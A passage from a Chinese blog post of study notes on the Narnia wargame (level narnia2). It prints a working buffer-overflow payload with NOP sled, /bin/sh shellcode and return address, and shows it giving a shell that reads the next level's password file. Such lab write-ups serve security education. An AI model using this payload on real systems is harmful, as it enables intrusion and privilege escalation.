      x53\x89\xe1\xb0\x0b\xcd\x8 0" + "\x90" * 67 + "\x50\xd8\xff\xff"'"
    • 进程5823执行新的程序:/bin/dash
  • $ cat /etc/narnia_pass/narnia3
    • cat: /etc/narnia_pass/narnia3: Permission denied

现在可以运行shellcode,但是由于某种原因,不能够读取narnia3账户口令。可以尝试脱离GDB调试环境运行程序。

  • narnia2@melinda:/narnia$ ./narnia2 'python -c 'print "\x90" * 50 +"\x31
    \xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\x
    e1\xb0\x0b\xcd\x80" + "\x90" * 67 + "\x50\xd8\xff\xff"'`
  • $ cat /etc/narnia_pass/narnia3
    • [这儿是narnia3答案]

终于发挥作用了!我们现在获得高权限的shell,并可以读取narnia3的密码(见图1.11)。希望通过这个例子,您能初步了解缓冲区溢出是如何产生以及如何进行漏洞利用。记住,这是一个二进制漏洞利用的起始阶段。现在可以用一些时间尝试其他的例子。

图1.11 narnia2漏洞利用

心得总结

说实话那么多工具最好按照功能和操作去区分,这样算下来就是搭建和安装的工作量大。其他的跑两遍就好了。

你可能感兴趣的:(网络安全,读书笔记)